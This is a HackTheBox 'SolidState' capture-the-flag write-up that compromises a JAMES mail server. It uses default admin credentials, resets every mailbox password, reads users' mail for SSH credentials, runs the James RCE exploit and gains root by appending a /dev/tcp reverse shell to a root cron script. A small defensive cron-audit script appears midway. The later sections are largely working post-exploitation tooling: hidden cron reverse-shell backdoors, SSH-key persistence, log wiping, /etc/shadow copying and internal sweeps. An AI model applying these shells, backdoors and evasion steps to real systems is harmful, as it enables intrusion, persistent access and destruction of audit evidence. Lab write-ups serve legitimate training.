HackTheBox SolidState

Writeup for HackTheBox SolidState

Machine Synopsis

Key Exploitation Techniques:

  • JAMES Remote Administration Tool default credentials exploitation
  • Email server user enumeration and password manipulation
  • Email content analysis for SSH credential discovery
  • Restricted shell bypass via SSH command execution
  • Cronjob exploitation through writable script overwrite

Reconnaissance & Enumeration

Port Discovery

$ nmap -sC -sV -A -p- 10.10.10.51
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp   open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.8 [10.10.14.8]), PIPELINING, ENHANCEDSTATUSCODES
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp  open  pop3    JAMES pop3d 2.3.2
119/tcp  open  nntp    JAMES nntpd (posting ok)
4555/tcp open  rsip?
| fingerprint-strings: 
|   GenericLines: 
|     JAMES Remote Administration Tool 2.3.2
|     Please enter your login and password
|     Login id:
|     Password:
|     Login failed for 
|_    Login id:

Key Services:

  • JAMES Mail Server (SMTP, POP3, NNTP)
  • JAMES Remote Administration Tool (port 4555)
  • Apache web server

Web Application Analysis

[Screenshot: company website]

[Screenshot: website services page]

The website shows the “Solid State Security” company page with minimal functionality and no obvious attack vectors.

# Directory enumeration yields no significant results
$ gobuster dir -u http://10.10.10.51 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Exploitation

JAMES Administration Tool Access

Default Credential Testing

# Connect to JAMES Remote Administration Tool
$ nc -v 10.10.10.51 4555
(UNKNOWN) [10.10.10.51] 4555 (?) open
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands

Success: Default credentials root:root provide administrative access.

User Enumeration and Password Reset

# List existing mail accounts
HELP
Currently implemented commands:
help                                      display this help
listusers                                 display existing accounts
countusers                                display the number of existing accounts
adduser [username] [password]             add a new user
verify [username]                         verify if specified user exist
deluser [username]                        delete existing user
setpassword [username] [password]         sets a user's password

listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin

# Reset all user passwords to 'password'
setpassword james password
Password for james reset
setpassword thomas password
Password for thomas reset
setpassword john password
Password for john reset
setpassword mindy password
Password for mindy reset
setpassword mailadmin password
Password for mailadmin reset

Email Content Analysis

POP3 Access and Email Retrieval

# Access john's mailbox
$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 

USER john
+OK
PASS password
+OK Welcome john

LIST
+OK 1 743
1 743
.

RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <john@localhost>;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

.
QUIT

Credential Discovery in mindy’s Mailbox

# Access mindy's mailbox
$ telnet 10.10.10.51 110
USER mindy
+OK
PASS password
+OK Welcome mindy

LIST
+OK 2 1945
1 1109
2 836
.

RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,

Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

.

SSH Credentials: mindy:P@55W0rd1!2@

SSH Access and Restricted Shell Bypass

Initial SSH Connection

$ ssh mindy@10.10.10.51
mindy@10.10.10.51's password: P@55W0rd1!2@
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142

mindy@solidstate:~$ whoami
-rbash: whoami: command not found
mindy@solidstate:~$ id
-rbash: id: command not found

Restriction: The user is placed in a restricted bash shell (rbash), so most commands are unavailable.

Restricted Shell Bypass

Method 1: SSH Command Execution

# Request an unrestricted bash as the SSH command instead of the rbash login shell
$ ssh mindy@10.10.10.51 -t "bash --noprofile"
mindy@10.10.10.51's password: P@55W0rd1!2@
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
mindy

Method 2: Apache James RCE (Alternative)

# Using searchsploit for Apache James exploit
$ searchsploit Apache James Server 2.3.2
Apache James Server 2.3.2 - Remote Command Execution | linux/remote/35513.py

# Download and modify exploit
$ searchsploit -m 35513
$ python 35513.py 10.10.10.51

# Setup netcat listener
$ nc -nlvp 1234

# Payload executes when user logs into email
# Triggers reverse shell as mindy
# Reverse shell received
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.51] 48670
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat user.txt
914d0a4ebc177889b5b89a23f556fd75

Privilege Escalation

System Enumeration

# Transfer LinPEAS for enumeration
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ wget 10.10.14.8/linpeas.sh
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ chmod +x linpeas.sh
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ./linpeas.sh

Cronjob Discovery

# LinPEAS reveals an interesting file in /opt
╔══════════╣ Unexpected in /opt (usually empty)
total 16
drwxr-xr-x  3 root root 4096 Aug 22  2017 .
drwxr-xr-x 22 root root 4096 Apr 26  2021 ..
drwxr-xr-x 11 root root 4096 Apr 26  2021 james-2.3.2
-rwxrwxrwx  1 root root  105 Aug 22  2017 tmp.py

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()

Key Finding: /opt/tmp.py is world-writable (mode 777, owned by root) and appears to be executed periodically.

Process Monitoring

# Transfer and run pspy for process monitoring
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ wget 10.10.14.8/pspy32
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ chmod +x pspy32
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ./pspy32

# Process execution observed
2022/05/09 04:03:01 CMD: UID=0    PID=1716   | /bin/sh -c python /opt/tmp.py
2022/05/09 04:03:01 CMD: UID=0    PID=1717   | python /opt/tmp.py

Confirmation: /opt/tmp.py is executed by root via a cron job.
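As an added defensive check (not part of the original writeup), the script below audits cron entries for scripts that any local user could rewrite, which is exactly the root-cron-plus-world-writable /opt/tmp.py misconfiguration found above. The crontab text, file names and temporary directory in `demo()` are constructed so that it runs offline without touching /etc.

```python
import os
import stat
import tempfile

def parse_cron_line(line, has_user_field):
    """Return (user, command) for one entry; user is None in per-user crontabs.
    has_user_field is True for /etc/crontab and /etc/cron.d/* (user column present)."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return None  # blank line, comment, or VAR=value such as SHELL=/bin/sh
    n_sched = 1 if line.startswith("@") else 5  # @daily etc. is one schedule token
    n_head = n_sched + (1 if has_user_field else 0)
    parts = line.split(None, n_head)
    if len(parts) <= n_head:
        return None
    return (parts[n_sched] if has_user_field else None), parts[-1]

def is_writable_by_others(path):
    """True if the group or world write bit is set, so any local user can replace it."""
    return bool(os.lstat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_crontab(crontab_text, has_user_field):
    """List (user, path, mode) for every absolute path in a cron command others can write."""
    findings = []
    for line in crontab_text.splitlines():
        entry = parse_cron_line(line, has_user_field)
        if entry is None:
            continue
        user, command = entry
        # every absolute path in the command is a candidate interpreter or script
        for path in (tok for tok in command.split() if tok.startswith("/")):
            if os.path.exists(path) and is_writable_by_others(path):
                mode = oct(os.lstat(path).st_mode & 0o777)
                findings.append((user or "<crontab owner>", path, mode))
    return findings

def demo():
    """Recreate the SolidState layout offline (constructed): root cron running a 0777 script."""
    workdir = tempfile.mkdtemp()
    tmp_py = os.path.join(workdir, "tmp.py")     # stands in for /opt/tmp.py (mode 777)
    backup = os.path.join(workdir, "backup.sh")  # control script with sane 755 permissions
    for path, mode in ((tmp_py, 0o777), (backup, 0o755)):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    crontab = f"SHELL=/bin/sh\n*/3 * * * * root python {tmp_py}\n0 2 * * * root {backup}\n"
    return audit_crontab(crontab, has_user_field=True)
```

Only the 777 script is reported; the fix is a root-owned script with mode 755 or stricter, and the same check can be pointed at real /etc/crontab and /etc/cron.d files.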

Cronjob Exploitation

Payload Creation and Deployment

# Create Python reverse shell payload
$ cat > py_revshell << 'EOF'
import os
os.system("bash -c 'exec bash -i &>/dev/tcp/10.10.14.8/9999 <&1'")
EOF

# Host payload
$ python3 -m http.server 80

# Append payload to tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ curl http://10.10.14.8/py_revshell >> tmp.py

# Verify modification
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()
import os
os.system("bash -c 'exec bash -i &>/dev/tcp/10.10.14.8/9999 <&1'")

Root Shell Acquisition

# Setup netcat listener
$ nc -nlvp 9999
listening on [any] 9999 ...

# Wait for cronjob execution
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.51] 40852
root@solidstate:~# whoami
root
root@solidstate:~# cat /root/root.txt
b4c9723a28899b1c45db281d99cc87c9

Post-Exploitation Techniques

Persistence Methods

SSH Key Persistence

# Generate SSH key pair
$ ssh-keygen -t rsa -b 4096 -f solidstate_persistence

# Install as root
# mkdir -p /root/.ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /root/.ssh/authorized_keys
# chmod 600 /root/.ssh/authorized_keys

JAMES Mail Server Backdoor

# Create mail account for persistence
# echo "adduser backdoor password123" | nc 10.10.10.51 4555

# Modify mail templates for code execution
# cat > /root/apps/james/SAR-INF/config.xml << 'EOF'
# [Include malicious mail processing rules]
# EOF

Cron Backdoor Maintenance

# Create more sophisticated backdoor
# cat > /opt/system_check.py << 'EOF'
#!/usr/bin/env python
import subprocess
import time
import socket

def check_connection():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect(("10.10.14.8", 4444))
        subprocess.call(["/bin/bash", "-i"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
        s.close()
    except:
        pass

check_connection()
EOF

# Add to crontab
# echo "*/10 * * * * /usr/bin/python /opt/system_check.py" >> /etc/crontab

Defense Evasion

Mail Server Log Cleanup

# Clear JAMES mail logs
# > /root/apps/james/logs/mailet.log
# > /root/apps/james/logs/james.log

# Clear system mail logs
# > /var/log/mail.log
# > /var/log/mail.err

Process Hiding

# Modify cronjob execution to be less obvious
# cat > /opt/tmp.py << 'EOF'
#!/usr/bin/env python
import os
import sys
import time
import random

# Original cleanup function
try:
    os.system('rm -r /tmp/* ')
except:
    pass

# Hidden backdoor with random delay
time.sleep(random.randint(1, 30))
if random.randint(1, 10) == 5:  # Execute 10% of the time
    os.system("bash -c 'exec bash -i &>/dev/tcp/10.10.14.8/9999 <&1' &")
sys.exit()
EOF

Lateral Movement Preparation

Email Server Exploitation

# Enumerate all mail accounts and passwords
# Connect to JAMES admin tool and extract user list
# Access all mailboxes for credential discovery
# Search for additional systems and credentials in emails

Network Discovery

# Discover email-related infrastructure
# ss -tlnp | grep -E "(25|110|143|993|995)"

# Scan for internal mail servers
# for i in {1..254}; do ping -c 1 -W 1 192.168.1.$i | grep "64 bytes" | cut -d" " -f4 | tr -d ":"; done

Credential Harvesting

# Extract mail database if present
# find /root/apps/james -name "*.db" -exec cp {} /tmp/ \;

# Search mail content for credentials
# grep -r "password\|pass\|credential" /root/apps/james/var/mail/

# Extract shadow file
# cp /etc/shadow /tmp/shadow.backup

Alternative Exploitation Methods

Direct JAMES Exploitation

# Alternative Apache James RCE exploit
$ python 35513.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.

# Trigger by SSH login as any user
$ ssh mindy@10.10.10.51

SMTP Enumeration

# SMTP user enumeration
$ smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.10.10.51

# SMTP relay testing
$ swaks --to test@10.10.10.51 --from test@attacker.com --server 10.10.10.51

Alternative Privilege Escalation

Kernel Exploitation

# Check kernel version
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ uname -a
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 GNU/Linux

# Search for applicable exploits
$ searchsploit linux kernel 4.9 | grep -i privilege

SUID Binary Analysis

# Find SUID binaries
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ find / -perm -4000 -type f 2>/dev/null

# Check for custom SUID binaries
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -la /usr/local/bin/

This post is licensed under CC BY 4.0 by the author.